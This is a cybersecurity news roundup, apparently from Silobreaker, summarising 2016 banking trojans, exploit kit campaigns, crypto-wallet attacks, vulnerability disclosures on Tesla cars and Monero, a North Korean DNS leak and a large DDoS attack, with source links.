Malware Qadars trojanThe Qadars trojan [1], now a number of years old, has been turned toward UK banks. The trojan, which has the ability to steal bank details and secure admin rights to infected systems, has been spotted attacking 18 separate banking institutions both in the UK and in other European countries. The malware is thought to have originated from Russia, and the creators are thought to be organised and professional, evidenced by the numerous patches and versions of Qadars that have been spotted. It is by no means as prevalent as Dridex [2] but this reflects a need to maintain a low profile on the part of the attackers rather than a less-advanced trojan. More information [3].Tordow trojanFormally identified as ‘trojan-Banker.AndroidOS.Tordow.a’, Tordow [4] was discovered in February 2016 and has been infecting smartphones, rooting the user’s devices, then stealing their data and uploading it to the author’s server. The trojan is primarily distributed via clones of popular Android apps, duping users into downloading them and then installing malicious code. Once the trojan is installed, it has root access, allowing it to steal contacts, make calls, and send or delete SMS messages. Targeting the database of the Android stock browser and Chrome for Android, the trojan extracts passwords and also steals the user's photos. More information [5]. Ongoing CampaignsRIG taking over from NeutrinoIn the ever competitive market of exploit kits the RIG EK [6] has become a frontrunner. As InfoSecurity Magazine reports, RIG has adopted the position that Angler [7] and Neutrino once held and is carrying out a massive malvertising campaign aimed at injecting scripts that redirect to rogue domains. RIG is currently deploying, amongst other malware, a version of CrypMIC ransomware to any devices that follow the infected adverts. The news of a rise in detections of RIG comes at the same time as Malwarebytes have found RIG on the Just For Men website hidden in a pop-up on their front page. Combe, the parent company of Just For Men have since updated the version of WordPress that they use and the compromise has been cleared. More information [8].Malware targets Reddit users’ cryptowalletsSeveral Reddit users are seeing their cryptowallets targeted by an unnamed drive-by-download malware, with some users having funds stolen. While details are still scarce, some reports suggest that the attack consists of malicious links designed to appeal to those monitoring changes in Bitcoin prices. With bait disguised as “price updates”, victims are redirected to a website called “CryptoChartiq” and, according to posts on Reddit, this has resulted in accounts being hacked and used to post links to malware or even to hack and empty e-wallets. More information [9]. Trending VulnerabilitiesTesla HackA group of hackers have proven that they can take control of Tesla vehicles from 12 miles away via a malicious Wi-Fi connection. After the car is connected, major functions such as the locking systems of the doors and boot can be controlled, while the brakes can be applied remotely. The hack was carried out by a top-end Chinese hacking group from Keen Security Lab and, luckily for Tesla, they did so with the purpose of alerting the car manufacturer to the issue before it could be exploited. Tesla have announced that a patch will be issued within the next 10 days. More information [10]. Cryptocurrency Monero vulnerability disclosed A vulnerability allowing hackers to steal Monero (a popular alternative to the cryptocurrency Bitcoin) from wallets was reported by security firm MWR InfoSecurity on Monday. Using what is referred to as a CSRF (Cross-Site Request Forgery), a Monero user would be tricked into visiting a web page containing malicious code which would take control of the Monero wallet, releasing funds to the hacker. The flaw was patched by Monero in the latest software update, however there are still worries that the vulnerability can affect users of third party wallets, likely to be less technically savvy than those using Monero directly. More information [11]. General NewsNorth Korean Internet domains leakedIn a leak of the country’s DNS servers, it appears that there are only 28 websites on the North Korean Internet, none of which are western. One of country’s top-level name servers was accidentally configured to allow global DNS zone transfers. This was detected by the TL;DR Project and the resulting data was put onto GitHub for everyone else to see. The impression that we get is that the North Korean Internet is rather basic. More information [12].Brian Krebs targeted with DDoS attackKrebsOnSecurity.com, the website of cybercrime journalist Brian Krebs, was hit by a major distributed denial-of-service (DDoS) attack that he claimed could be the largest in recorded history. The attack peaked at 665 Gbps and 143 million packets per second, and was carried out using a variety of DDoS attacks, including SYN and HTTP floods. Despite its scale, the attack was not successful in taking down the site due to Kreb’s DDoS mitigation provider. It is believed that a botnet consisting mainly of Internet of Things devices was used to target Krebs, but there is, as of yet, no information on who was behind the attack. More information [13]. The Silobreaker TeamDisclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.
[1] https://my.silobreaker.com/view360.aspx?item=11_643575535#?q=Keyphrase:%22Qadars%22&rd=true
[2] https://my.silobreaker.com/view360.aspx?item=11_773406215#?q=Keyphrase:%22Dridex%20Malware%22&rd=true
[3] http://www.zdnet.com/article/data-stealing-qadars-trojan-malware-takes-aim-at-18-uk-banks/
[4] https://my.silobreaker.com/view360.aspx?item=11_1072630168#?q=Keyphrase:%22Tordow%20Trojan%22&rd=true
[5] https://securelist.com/blog/mobile/76101/the-banker-that-can-steal-anything/
[6] https://my.silobreaker.com/view360.aspx?item=11_741119288#?q=Keyphrase:%22RIG%20Exploit%20Kit%22&rd=true
[7] https://my.silobreaker.com/view360.aspx?item=11_657356627#?q=Keyphrase:%22Angler%20Exploit%20Kit%22&rd=true
[8] https://blog.malwarebytes.com/cybercrime/2016/09/just-for-men-website-serves-malware/
[9] http://www.scmagazine.com/drive-by-mlaware-targets-crypto-wallets-of-reddit-users/article/523383/
[10] http://keenlab.tencent.com/en/2016/09/19/Keen-Security-Lab-of-Tencent-Car-Hacking-Research-Remote-Attack-to-Tesla-Cars/
[11] https://labs.mwrinfosecurity.com/advisories/csrf-vulnerability-allows-for-remote-compromise-of-monero-wallets/
[12] http://www.theinquirer.net/inquirer/news/2471424/north-korean-dns-leak-finds-just-28-official-kp-sites
[13] http://www.securityweek.com/brian-krebs-blog-hit-665-gbps-ddos-attack